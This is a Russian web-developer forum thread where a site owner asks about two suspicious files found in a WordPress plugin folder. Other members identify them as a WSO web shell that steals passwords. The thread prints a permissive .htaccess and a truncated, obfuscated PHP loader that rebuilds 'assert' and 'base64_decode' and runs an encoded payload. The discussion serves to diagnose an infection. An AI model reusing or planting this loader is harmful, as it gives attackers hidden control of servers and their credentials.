Форум Сайтостроение Веб-строительство

Что делает этот пхп файл?

djdiplomat
На сайте с 05.08.2009
Offline
136
djdiplomat
524

Нашел 2 файла в папке files_mf. Что они делают? На заразу похоже...

.htaccess

RewriteEngine on

Require all granted

Satisfy Any

<Files *>

allow from all;

</Files>

.php

Дел.
SeVlad

.... тут дохера таких букв, не поместились в сообщение для форума все...

Дел.
SeVlad

SeVlad
На сайте с 03.11.2008
Offline
1609
SeVlad
#1
djdiplomat:

.... тут дохера таких букв, не поместились в сообщение для форума все...

Ты когда научишься код в форум вставлять?! Поломал всю страницу.

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
bruder
На сайте с 03.02.2015
Offline
199
bruder
#2

Туда модуль Magic Fields кладет файлы. В этом коде ничего криминального нет.

djdiplomat
На сайте с 05.08.2009
Offline
136
djdiplomat
#3

Короче в ахиве два этих файла. Лежали тут /wp-content/files_mf/.

вот можно их скачать https://yadi.sk/d/c4iSb9MGj8Wkc

Ниже код пхп файла, но урезан.


$dba_optimize_erda = 'asse|||beamq|||rt'; 
$date_interval_create_from_date_string_abwc = 'base|||beamq|||6|||beamq|||4|||beamq|||_dec|||beamq|||ode';
$dba_optimize_erda = str_replace('|||beamq|||','',$dba_optimize_erda);
$date_interval_create_from_date_string_abwc = str_replace('|||beamq|||','',$date_interval_create_from_date_string_abwc); 
$date_sunset_phep = 'ZXZhbChnenVuY29|||beamq|||tcHJlc3MoYmFzZTY0X2RlY29kZSgnZU5ybGZYdGIyN2p5OE4vYlQyRzhPWFc4RFNFSmJiZWI0QUNsME5JTGRMbjBCdnl5anVNa1hodzdhenNFbHVXN3Z6TWp5Wlp2SVhSNzN1ZTk3SGxPaWFYUmFDU05wVWxzVS9NQStmS0UveVBoOGY5bUM2SGU4Zkh0VFUwQnphRStCQVNOOXlQQWU5Q2FvYUp2WW03UGxvSGpiT0RrQmtwa2RQVEJFbXlZWlpsWDNOcFNDQUhFNG42WHFCQmZidHNiYkMwVEgvcGpaOWF2VXNxQzVoTkRLWmFkV1JTWm9qMjlyM2huNVI0QitUenF6bEZjdVVXeGk3QVU5NlBZUXZCbUwyU3Y4TFlKZml1Zz09JykpKTs=';
$date_sunset_phep = str_replace('|||beamq|||','',$date_sunset_phep);
@$dba_optimize_erda($date_interval_create_from_date_string_abwc($date_sunset_phep));

У меня много сайтов где плагин mf2 юзаю, но папку . (точка) он нигде не создал.

SeVlad:
Ты когда научишься код в форум вставлять?! Поломал всю страницу.

Да там букв много. Не влезало. Я короче ступил чутка...

Спрашиваем и отвечаем по Спрашиваем и отвечаем по Как устанавливать плагины на
bruder
На сайте с 03.02.2015
Offline
199
bruder
#4

Пароли ворует всякие-разные. Явно русское произведение.

T
На сайте с 15.11.2011
Offline
120
Tecak
#5
bruder:
Пароли ворует всякие-разные. Явно русское произведение.

Что за пасквиль!?

Дешевые VDS - Дешевле некуда! (http://0ll0.ru/4Ta9y)
bruder
На сайте с 03.02.2015
Offline
199
bruder
#6

Раскодируй, потом еще разок, и увидишь.

Кстати, я не спец, но тут сильно воняет уязвимостью в этом модуле. ТС, обновляйся, если ее исправили. И конечно же пароли все смени, что на сервере прописаны.

нужна помощ в декодировании Лишние ссылки в теме Антикризисное продвижение Ваших сайтов
K5
На сайте с 21.07.2010
Offline
209
kgtu5
#7

ТС это WSO-шелл скрипт - 100% зараза

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий